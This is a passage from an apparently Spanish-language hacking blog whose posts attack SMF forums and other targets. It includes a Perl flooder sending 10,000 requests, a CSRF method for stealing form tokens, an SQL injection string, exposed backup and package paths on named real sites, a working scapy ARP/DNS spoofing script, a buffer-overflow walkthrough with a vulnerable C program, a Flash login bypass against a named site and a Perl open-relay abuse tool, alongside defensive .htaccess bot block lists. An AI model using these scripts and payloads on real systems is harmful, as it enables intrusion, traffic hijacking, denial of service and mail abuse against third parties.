pueden cambiar la variable globalizada $_GET por alguna otra como $_REQUEST, etc.

XSRF:

Bueno siempre que se tiene que remitir información mediante un post en un SMF hay 2 inputs que básicamente deberían de funcionar como captchas estos son: seqnum y sc

Código:

<input type="hidden" name="sc" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" />
<input type="hidden" name="seqnum" value="xxxxxxxx" />

Pero estos se pueden saltar mediante un XSRF (cross site request forgery). Suponiendo que creamos un socket en ajax, un usuario con permiso de enviar un mensaje, cerrar post, cambiar titulo, borrar foros, etc... entra a una pagina con el socket, al tener la cookie el socket podria hacer un GET a la pagina y mediante el código que recibe podría parsear y sacar estos 2 valores, después simplemente crea otro socket, esta vez que envie un post con el sc y el seqnum, entonces podriamos ordenar que haga lo que sea.

Flooder por log de errores:

Código:

#!/usr/bin/perl
use LWP::UserAgent;
sub uso { print "[-]Uso: smf.pl [dominio]\n"; exit; }
my $host = $ARGV[0];
$host = shift || &uso;
$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
$texto = "Xianur0 Was Here" x 15;
$req = HTTP::Request->new(GET => 'http://xianur0.phpnet.us/index.php?action=help;page['.$texto.']=loginout');
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
for($i = 0; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "Enviados:".$i."\n";
} else {
print "Error: " . $res->status_line . "\n";
}
}

Errores de manejo de paquetes:

Error de manejo de paquetes por temporal, el SMF al subir una modificación y ejecutarla, hace una copia de seguridad de cada archivo PHP que es tocado, pero al finalizar la modificación, no la borra, entonces esta puede ser accedida por cualquier otro usuario:

http://foro.infiernohacker.com/index.php~
http://foro.level-23.com/index.php~
http://foro.el-hacker.com/index.php~
http://www.mepisimo.com/forum/Settings.php~
http://www.erautomotriz.com/forum/index.php~ (Agregada por yxed)

Error de Permisos de Archivos:
Algunos Archivos del SMF no están protegidos como deberían, por ejemplo:

http://foro.infiernohacker.com/Packages/installed.list

Esto puede ser usado para scanneo por paquetes (muchos paquetes que son enviados a SMF tienen fallas de seguridad como son XSS, SQL Inyection y en algunos casos RFI)

Obteniendo Directorio del servidor (útil para atacar free hostings)

http://foro.infiernohacker.com/SSI.php?ssi_layers
Código:

Notice: Undefined variable: ssi_layers in /home/infierno/public_html/foro/SSI.php on line 99
Hacking attempt...

y también sirve para crear logs pesados ya que estos errores se guardan directamente en:

http://foro.infiernohacker.com/error_log

Matando Conexiones SQL

Código de Prueba: -1/**/union/**/select/**/1,memberName,passwd/**/from/**/smf_members/*

Introducimos ese código en el buscador y el resultado:

Código:

Database Error: Lost connection to MySQL server during query
File: /home/vol4/phpnet.us/x/xxxxxxxxxxxx/xxxxxxxxxxxx.phpnet.us/htdocs/Sources/Search.php
Line: 1099Database Error: MySQL server has gone away
File: /home/vol4/phpnet.us/x/xxxxxxxxxxxx/xxxxxxxxxxxx.phpnet.us/htdocs/Sources/Load.php
Line: 2005

la configuración del buscador varia, Esto mas que nada sucede en la versiones updateadas, es decir, actualizadas a la 1.1.4:
Dentro del:
?action=managesearch

tiene que estar desactivada la opción: Activar búsqueda simple (?)

iré agregando mas conforme los encuentre en la DB de pandora's Box (foro mio que cerré) jeje

agrego algo, también se pueden robar paquetes subidos al servidor:

en el Packages/installed.list
aparese la lista de paquetes y el nombre con que se subieron los archivos, por ejemplo:

Registered Links|^|registered links|^|vbgamer45:RegLinks|^|1.0
YouTube BBCode|^|youtube|^|karlbenson:youtubebbcode|^|1.6
Auto Embed Video Clips|^|AEVC_v2.1.2.zip|^|karlbenson:autoembedvideoclips|^|2.1.2
SMF 1.0.13 / 1.1.5 / 2.0 b3.1 Update|^|smf_patch_1.0.13_1.1.5_2.0-b3.1.zip|^|smf:smf-1.0.13-1.1.5-2.0.b3.1|^|1.0

entonces para descargar los paquetes seria:

Packages/nombre_paquete.zip

por ejemplo:

http://foro.infiernohacker.com/Packages/smf_patch_1.0.13_1.1.5_2.0-b3.1.zip

(pongo la web de infiernohacker sin ánimos de joder, simplemente es un ejemplo, y de paso si quieren parchar háganlo ...)

Configuraciones .htaccess

2008-08-30T13:45:00.000-07:00

Metodos anti-bots:
Filtrado por cookie:

.htaccess:
RewriteEngine On
RewriteCond %{HTTP_COOKIE}!^.*Test-bot.*$ [NC]
RewriteRule .* /setcookie.php [NC,L]

setcookie.php:

<?php


setcookie("Test-bot", 'ok', httponly);

?>

Filtrado por user-agent:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^UbiCrawler [OR]
RewriteCond %{HTTP_USER_AGENT} ^MSIECrawler [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Scanner [OR]
RewriteCond %{HTTP_USER_AGENT} ^Acunetix\ Web\ Scanner [OR]
RewriteCond %{HTTP_USER_AGENT} ^Acunetix\ Vulnerability\ Scanner [OR]
RewriteCond %{HTTP_USER_AGENT} ^Acunetix\ Vulnerability\ Scanner [OR]
RewriteCond %{HTTP_USER_AGENT} ^HTTrack [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^perl [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus [OR]
RewriteRule ^.* - [F,L]
SetEnvIf Acunetix-User-agreement http://www.acunetix.com/wvs/disc.htm no_access=yes
RewriteCond %{ENV:no_access} yes
RewriteRule .* - [F,L]

Como Notaran Filtre tambien al acunetix (totalmente en las ultimas lineas:
SetEnvIf Acunetix-User-agreement http://www.acunetix.com/wvs/disc.htm no_access=yes
RewriteCond %{ENV:no_access} yes
RewriteRule .* - [F,L]

en las cuales lo que decimos es: si el existe el header Acunetix-User-agreement con contenido: http://www.acunetix.com/wvs/disc.htm Mandar Forbiden)

Filtrado de robo de Cookies:

RewriteCond %{HTTP_COOKIE} PHPSESSID=([^;]+) [NC]
RewriteRule ^(.*)$ - [env=sessid:%1]
Header set Set-Cookie "PHPSESSID=%{sessid}e; path=/; HttpOnly" env=sessid

En este caso filtre unicamente la cookie PHPSESSID (ya que solo es un codigo de ejemplo) pero puede cambiar el nombre de la cookie.

Restringir Metodos:

RewriteCond %{REQUEST_METHOD} !^(GET|POST)
RewriteRule .* - [F,L]
IndexIgnore *

Para entender mas esto, leer mi texto de hacking HTTP.

Desactivar el Upload:

LimitRequestBody 0

Eso es util unicamente si no usamos un gestor en el directorio de nuestra web para subir archivos (cada quien le ve su utilidad en la seguridad).

Honeypot a los scanneres HTTP de tipo Brutes Forces:
IndexIgnore *
Options All -Indexes
ErrorDocument 101 /error.php
ErrorDocument 204 /error.php
ErrorDocument 205 /error.php
ErrorDocument 400 /error.php
ErrorDocument 500 /error.php
ErrorDocument 400 /error.php
ErrorDocument 403 /error.php
ErrorDocument 404 /error.php
ErrorDocument 405 /error.php
ErrorDocument 406 /error.php
ErrorDocument 407 /error.php
ErrorDocument 408 /error.php
ErrorDocument 409 /error.php
ErrorDocument 411 /error.php
ErrorDocument 413 /error.php
ErrorDocument 414 /error.php
ErrorDocument 416 /error.php
ErrorDocument 417 /error.php
ErrorDocument 501 /error.php
ErrorDocument 502 /error.php
ErrorDocument 503 /error.php
ErrorDocument 504 /error.php
ErrorDocument 505 /error.php

Codigo del error.php:
<?php
echo '<b>Warning:</b> mysql_query(): Access denied for user: root@localhost (Using

  password: YES) in <b>/home/root/public_html/mysql.php</b> on line <b>12</b>';

?>

La idea de esto fue de inyexion jeje..

Ejemplo de Envenenador HTTP en Python (basado en scapy)

2008-08-26T19:14:00.000-07:00


#!/usr/bin/python

from twisted.internet import reactor
from twisted.web import static, server
import sys
import os
from scapy import *
import socket
import fcntl
import struct
import commands


if os.getuid()!=0:
print "Necesitas uid 0 Para ejecutar este Script!"
sys.exit(1)
if len(sys.argv) != 4:
print "Uso: ./xianur0.py  [DNS Server] [Victima] [Interface]"
sys.exit(1)

def getip(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915,
struct.pack('256s', ifname[:15])
)[20:24])

def getmac(iface):
ifconfig = '/sbin/ifconfig'
telltale = 'HWaddr '
cmd = '%s %s' % (ifconfig, iface)
output = commands.getoutput(cmd)

inet = output.find(telltale)
if inet >= 0:
start = inet + len(telltale)
end = output.find(' ', start)
addr = output[start:end]
else:
print 'No Se pudo Extraer el Mac de esta interface!'
sys.exit(1)
return addr
dns_server = sys.argv[1]
target_ip = sys.argv[2]
conf.iface = sys.argv[3]
tu_ip = getip(conf.iface)
tu_mac = getmac(conf.iface)


def constructor():
try:
if os.fork() > 0: os._exit(0)
except OSError, error:
print 'Error Fork: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
os.chdir('/')
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
 print 'Servidor Web Iniciado: PID %d' % pid
 sendp(Ether(dst='ff:ff:ff:ff:ff:ff')/
   ARP(pdst=target_ip,psrc=dns_server,hwsrc=tu_mac),iface=conf.iface)
 pck = sniff(filter='port 53',iface=conf.iface,count=1)
 ip = pck[0].getlayer(IP)
 dns = pck[0].getlayer(DNS)
 response = IP(dst=ip.src,src=ip.dst)/UDP(dport=ip.sport,sport=ip.dport)
 response /= DNS(id=dns.id,qr=1,qd=dns.qd,an=DNSRR(rrname=dns.qd.qname,ttl=10,rdata=tu_ip))
 response.display()
 send(response)
 os._exit(0)
except OSError, error:
print 'Error Fork: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
servidor()

def servidor():
twisted_html_server = static.File( './' )
reactor.listenTCP(80, server.Site(twisted_html_server))
reactor.run()

if __name__ == '__main__':

constructor()

Nota: Editen el codigo para que funcione correctamente, no permito scriptkiddies jeje ;)..

Daemons en Python

2008-08-26T18:57:00.001-07:00

def constructor(): #definimos el constructor del daemon
try:
if os.fork() > 0: os._exit(0) #sale si el fork no trabaja bien
except OSError, error:
print 'Error En Fork: %d (%s)' % (error.errno, error.strerror) #lanza el error
# de ejecucion del fork
os._exit(1)
os.chdir('/')
os.setsid()
os.umask(0)
try:
pid = os.fork() #obtiene el PID con el que trabajara nuestro daemon
if pid > 0: #si el pid es mayor a 0 el fork fue correcto
# y tenemos un lugar para nuestro daemon :)..
#Aqui Seria Lo que ejecutara el crearse el daemon, bien podemos solo imprimir el PID
os._exit(0)
except OSError, error:
print 'Error en Fork: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
#Aqui estaria la funcion del daemon (lo que hara nuestro daemon)
if __name__ == '__main__':

constructor() #cargamos nuestro constructor del daemon :)...

Teoria BOF

2008-08-26T18:30:00.000-07:00

Conceptos:

EIP: es el registro que almacena la direcci0n de la siguiente instruccion que debe ejecutar el procesador. IP por instruction pointer (puntero a instruccion)

EBP: puntero a base (base pointer), apunta al elemento mas alto de la pila. la pila (stack) es una estructura de datos que utiliza el procesador para ayudarse en la o de los programas.

OllyDbg: Debugger que utilizaremos.

shellcode: es una tira de instrucciones escritas en ASM y codificadas en hexadecimal, que es usualmente lo que queremos que se ejecute una vez producida la falla.

NOP: (0x90 o \x90)instruccion en ASM que significa no operational, es decir, que no haga nada. lo nico que hace es incrementar en uno el registro de siguiente instruccion (EIP) y ejecute lo que alla se encuentre. En nuestro caso sirve para que el procesador examine la memoria hasta que se encuentre con nuestra shellcode.

Teoria:
Antes de Comenzar a Programar tenemos que saber la teoria:

Tener claro la cantidad de bytes del programa
Llenar el buffer y el EBP con NOPs y la shellcode
Identificar la direccion de retorno para ubicarla en el EIP

Primero que nada necesitamos saber el tama;o del buffer:

Citar

char buffer[58];

En este caso podemos notar que es de 58 bytes.
Por ello si se sobrepasa este numero, podria haber problemas ...

Core Dump

Citar

Core Dump o Volcado de Memoria, es un registro no estructurado del contenido de la memoria en un momento concreto, generalmente utilizado para depurar un programa que ha finalizado su ejecucion incorrectamente. Actualmente se refiere a un archivo que contiene una imagen en memoria de un proceso determinado, pero originalmente consistira en un listado impreso de todo el contenido de la memoria.

Un volcado de memoria es toda la memoria utilizada por el programa instalado escrita a un archivo. El tama;o del volcado dependera del programa instalado (es igual al valor de ws_BaseMemSize en la estructura del Esclavo). Un volcado de memoria puede ser creado si la DebugKey es presionada durante la ejecucion o luego de un error si el boton CoreDump es presionado. El nombre del volcado de memoria creado sera ".whdl_memory". La ubicacion por defecto es "PROGDIR:" pero puede ser cambiada con la opcion CoreDumpPath. Cualquier fichero existente con el mismo nombre siempre sera sobrescrito. Si el programa instalado utiliza Memoria Fast adicional, sera salvada bajo el nombre ".whdl_expmem".

En otras palabras seria lo que ocurriria si sobrepasamos el tamao del buffer de la aplicacion vulnerable, que en este caso es de 58 bytes, es decir no es muy grande por lo cual con introducir 58 bytes en el char buffer causaria un core dumper.

Vamos al grano

Programe un exe con solo 10 bytes de buffer, asi que comenzemos a divertirnos:

Como podran darse cuenta el programa se murio , esto fue probocado ya que introduje mas bytes, que los que el buffer soportaba, por enden esto proboco un core dumper.

Sources del Programa Vulnerable:

Código:

#include 
#include 
#include 

void funcion(char *ax);

int main (int argc, char *argv[])

{
if(argc<2)
{
printf("Uso: %s cadena\x0a", argv[0]);
return 0;
}
funcion (argv[1]);
return (0);
}

void funcion (char *ax)

{
char buffer[10];
strcpy (buffer, ax);
printf ("Cadena:\n%s\n", buffer);
}

Cargamos el Archivo vulnerable con el OllyDbg:

Argumentos: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA.

Le damos en

29 Caracteres y sobre escribimos 4 del EBP y 1 del EIP, es decir que se desbordo con 24.

Â¿Como sabemos que los sobreescribimos?
Es simple, por que A en hexadecimal es 41 .

Bueno el buffer se lleno con 24, el ebp se llena con 4, y el EIP tambien, por enden, serian 32 para sobrescribir el EIP en totalidad, para corroborar utilizemos otra letra:

Argumentos: AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

y observaremos que en el eip nos resulta 42, B en hexadecimal es 42, por enden esto corrobora que sobrescribimos el eip correctamente .

Lo que nos queda saber es la direccion de retorno, la direccion de retorno es a donde queremos que salte nuestro shellcode, es decir la direccion siguiente que se ejecutara en la pila.

Localizamos el Push EBP, anotamos su direccion de memoria y la invertimos, es decir en caso de ser: bffff9d0 quedara: d0f9ffbf y pasado a array C: \xd0\xf9\xff\xbf (en el ejemplo de una pila linux).

Ahora vamos a la accion:

Suponiendo que el buffer y el EBP se llenan con 1028 (dando un ejemplo) y que es un shellcode de 23 tendran que ser 1005 NOPs...

En orden los datos serian: 1005 NOPs, 23 shellcode, Direccion de Retorno.

Gracias Zodiac por las definiciones

Bypasseando Logins Flash y Ajax

2008-08-26T17:23:00.000-07:00

Este texto ya fue hace varios a;os que lo escribi, aun no tenia muchos conocimientos (y ya los tengo? xD), pero aqui se los pongo (igualmente sirve aunque sea viejo jeje)

Cito todo tal cual lo escribi hace tiempo:

Introduccion

La cosa es simple necesitamos achilles, una web con login flash y firefox (puede ser cualquier otro navegador pero yo les recomiendo un millon de veces firefox).

La Tecnica

Bueno ahora bien comenzemos:

1? Cargamos el login flash
2? Configuramos el navegador para utilizar achilles
3? Corremos achilles y lo cofiguramos

Bueno ahora cuando este todo configurado, introducciomos en usuario el nombre del usuario al cual queremos "hackear", le damos enviar o send o lo que sea XD y nos aparesera el post con el usuario y el pass que metimos, le damos send, esperamos a que nos aparesca algo como esto:

Código:

HTTP/1.1 200 OK
Date: Sat, 12 May 2007 20:20:34 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=g3ko5d2bndvusme8bqiib21if2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 45
Content-Type: text/html; charset=ISO-8859-1

&auto=0&username=Admin&error=ds_noUserOrPass&

Lo Editamos y quedaria algo como:

Código:

HTTP/1.1 200 OK
Date: Sat, 12 May 2007 20:20:34 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=g3ko5d2bndvusme8bqiib21if2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 45
Content-Type: text/html; charset=ISO-8859-1

&auto=1&username=Admin

Le damos send y empezara a cargar el panel del usuario

Aqui esta un video-tutorial de la falla By Me XD
http://www.badongo.com/file/3031646

Parte 2:

Introduccion

Creo que ya le estamos dando duro a los login hechos en flash, bueno esta es la segunda parte de mi manual hacking login flash, en esta entrega les ense?are otra forma de hackear los logins hechos en flash que mas que nada parese ser una tecnica de crackeo por el ejemplo que dare, bueno utilizando google:

allinurl: admin.swf
me tope con la web: http://www.kitchenhomecreations.com/admin.swf
Bueno utilizare esa web para esta entregra, Primero que nada la lista de lo que utilizaremos:

Achilles (solo para testeo)
Firefox
Un Decompilador de Flash (en este ejemplo utilizare Flash Decompiler)

La Tecnica

Bueno lo primero es testear el flash como hicimos en la primera entrega de hacking login flash, si no aparesen datos en la pantalla de achilles y nos marca error de contrase?a, es por que la pass esta almasenada en el flash, en ese caso procedemos a crackear el flash, instalamos el Flash Decompiler (o el decompilador de flash que utilizen), y abrimos el flash
En el menu de la derecha vamos a Scripts, en este caso son 10, bueno buscamos el script del boton que se encarga de comprovar la pass.

Bueno hasta aqui tenemos 2 posibilidades 1 entrar directamente a la url que nos aparese o insertar la pass que nos aparese y que nos mande a esa url.

Se perdieron 2 imagenes, pero igualmente creo que es algo entendible...

LogicKey E-zine Primera Edicion

2008-08-25T18:44:00.000-07:00

La Primera E-zine Donde Escribi...

Descargar

Haciendo Trampa en Video Juegos

2008-08-21T18:54:00.000-07:00

Este manual no esta enfocado a solo una consola. No es muy extenso, pero le agregare mas cuando tenga tiempo ;)...

http://docs.google.com/Doc?id=df3ckfs6_153c9s4c6hk

Mail Inyector

2008-08-18T18:24:00.000-07:00

Programe esta tool para filtrarse en los servidores de correo, esta tool puede detectar los servidores de correo de un dominio dado, intentar logearse en SMTP y en POP3 SSL, enviar un mail, y revisar si dicho mensaje llega a la bandeja de entrada:


#!/usr/bin/perl

# By Xianur0\n
use LWP::UserAgent;
use MIME::Base64::Perl;
use XML::Simple;
use Socket;
use Net::DNS;
use Net::SMTP::SSL;
use Mail::POP3Client;
use IO::Socket::SSL;

my $user = $ARGV[0];
my $password = $ARGV[1];
my $web = $ARGV[2];
my $servidor;
$web = shift || &uso;

sub uso {
print "[-]Uso: mailer.pl [Usuario Gmail] [Password Gmail] [Web]\n"; exit;
}

sub gmail {
my $cuenta = encode_base64("$user:$password");
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => 'https://mail.google.com/mail/feed/atom');
$req->content_type('application/x-www-form-urlencoded');
$req->header('Authorization' => 'Basic '.$cuenta);
my $res = $ua->request($req);
if ($res->is_success) {
open(XMLFILE,"> gmail.xml") || die "No pudo abrirse: $!";
print XMLFILE $res->content;
close(XMLFILE);
&xmlleer;
}
}

sub xmlleer {
my $gmail = XMLin("gmail.xml");
for($gmail->{entry}) {
if($_->{title} =~ 'servidor de correo bypasseado :D') {
print "\n[-]Felicidades! Tienes un mailer :D!...\n";
}
else { print "[-]El Mensaje no ha llegado a la bandeja de entrada....\n";}
}
}

sub enviar {
socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
if(connect( SOCKET, pack( 'Sn4x8', AF_INET, 25, $servidor ))) {
print "[-]Conectado a $servidor, Enviando Paquete....\n";
print SOCKET "HELO $web";
print SOCKET 'MAIL FROM: xianur0.hacked@level-23.com';
print SOCKET "RCPT TO: ".$user.'@gmail.com';
print SOCKET 'DATA';
print SOCKET 'Subject: servidor de correo bypasseado :D';
print SOCKET 'From: xianur0.hacked@level-23.com';
print SOCKET "To: $user";
print SOCKET "Servidor de Correo Bypasseado\ndominio: $web\n.";
print SOCKET 'quit';
close SOCKET;
print "[-]Paquete Enviado!\n";
&gmail;
}
else {print "[-]Servidor $servidor Puerto 25 filtrado...\n"; }

}

sub MX {
my $consulta   = Net::DNS::Resolver->new;
my $consulta = $consulta->query($web, "MX");
if ($consulta) {
print "[-]Servidores MX:\n";
  foreach $array (grep { $_->type eq 'MX' } $consulta->answer) {
$mailers = $array->string;
my @datos = split(" ", $mailers);
$servidor = pop(@datos);
chop($servidor);
print $servidor."\n";
&enviar;
&smtps;
  }
} else {print "[-]No Se Encontro Servidor de Correo Asociado!\n";}
print "\n\n";
}

sub smtps {
my $user = '';
my $pass = '';
my $to         = $user.'@gmail.com';
my $from_email = 'xianur0.hacked@level-23.com';
my $subject    = 'servidor de correo bypasseado :D';
my $smtps = Net::SMTP::SSL->new($servidor,
                           Port => 465,
                           DEBUG => 1,
                           ) or die "Servidor $servidor Puerto 465 Filtrado...\n";
defined ($smtps->auth($user, $pass))
or die "[-]Servidor $servidor Puerto 465 Con Password...\n";
print "\n[-]Servidor SMTPS Sin Password Detectado: $servidor\n";
$smtps->mail($from_email);
$smtps->to($to);
$smtps->data();
$smtps->datasend("To: $to\n");
$smtps->datasend(qq^From: "$from_email\n^);
$smtps->datasend("Subject: $subject\n\n");
$smtps->datasend("Servidor de Correo Bypasseado\nServidor: $servidor\n");
$smtps->dataend();
$smtps->quit();
print "[-]Mensaje Enviado!\n";
select(undef, undef, undef, 10);
&gmail;
}

&MX;

A mis necesidades le programe que revisara si el mail llego a la bandeja de entrada, pero pueden editar el codigo para lo que mas les convenga.

Tutorial Hping

2008-08-18T18:18:00.000-07:00

Hping es una exelente herramienta de tipo generador de paquetes TCP, UDP, ICMP, etc. Que nos Permite hacer inumerables cosas, entre ellas, testear firewalls, scannear puertos (mediante flags), Os Fingerprint, Traceo de rutas, e incluso D.o.Seador, Hping2 es una utilidad principalmente creada para auditar redes, y realmente cumple su cometido y mas jajaja.....

para comenzar el comando hping -h nos devuelve la lista de comandos (opciones):

Code:

usage: hping host [options]
-h  --help      show this help
-v  --version   show version
-c  --count     packet count
-i  --interval  wait (uX for X microseconds, for example -i u1000)
   --fast      alias for -i u10000 (10 packets for second)
-n  --numeric   numeric output
-q  --quiet     quiet
-I  --interface interface name (otherwise default routing interface)
-V  --verbose   verbose mode
-D  --debug     debugging info
-z  --bind      bind ctrl+z to ttl           (default to dst port)
-Z  --unbind    unbind ctrl+z
Mode
default mode     TCP
-0  --rawip      RAW IP mode
-1  --icmp       ICMP mode
-2  --udp        UDP mode
-8  --scan       SCAN mode.
                Example: hping --scan 1-30,70-90 -S www.target.host
-9  --listen     listen mode
IP
-a  --spoof      spoof source address
--rand-dest      random destionation address mode. see the man.
--rand-source    random source address mode. see the man.
-t  --ttl        ttl (default 64)
-N  --id         id (default random)
-W  --winid      use win* id byte ordering
-r  --rel        relativize id field          (to estimate host traffic)
-f  --frag       split packets in more frag.  (may pass weak acl)
-x  --morefrag   set more fragments flag
-y  --dontfrag   set dont fragment flag
-g  --fragoff    set the fragment offset
-m  --mtu        set virtual mtu, implies --frag if packet size > mtu
-o  --tos        type of service (default 0x00), try --tos help
-G  --rroute     includes RECORD_ROUTE option and display the route buffer
--lsrr           loose source routing and record route
--ssrr           strict source routing and record route
-H  --ipproto    set the IP protocol field, only in RAW IP mode
ICMP
-C  --icmptype   icmp type (default echo request)
-K  --icmpcode   icmp code (default 0)
   --force-icmp send all icmp types (default send only supported types)
   --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
   --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
   --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
   --icmp-help  display help for others icmp options
UDP/TCP
-s  --baseport   base source port             (default random)
-p  --destport   [+][+] destination port(default 0) ctrl+z inc/dec
-k  --keep       keep still source port
-w  --win        winsize (default 64)
-O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
-Q  --seqnum     shows only tcp sequence number
-b  --badcksum   (try to) send packets with a bad IP checksum
                many systems will fix the IP checksum sending the packet
                so you'll get bad UDP/TCP checksum instead.
-M  --setseq     set TCP sequence number
-L  --setack     set TCP ack
-F  --fin        set FIN flag
-S  --syn        set SYN flag
-R  --rst        set RST flag
-P  --push       set PUSH flag
-A  --ack        set ACK flag
-U  --urg        set URG flag
-X  --xmas       set X unused flag (0x40)
-Y  --ymas       set Y unused flag (0x80)
--tcpexitcode    use last tcp->th_flags as exit code
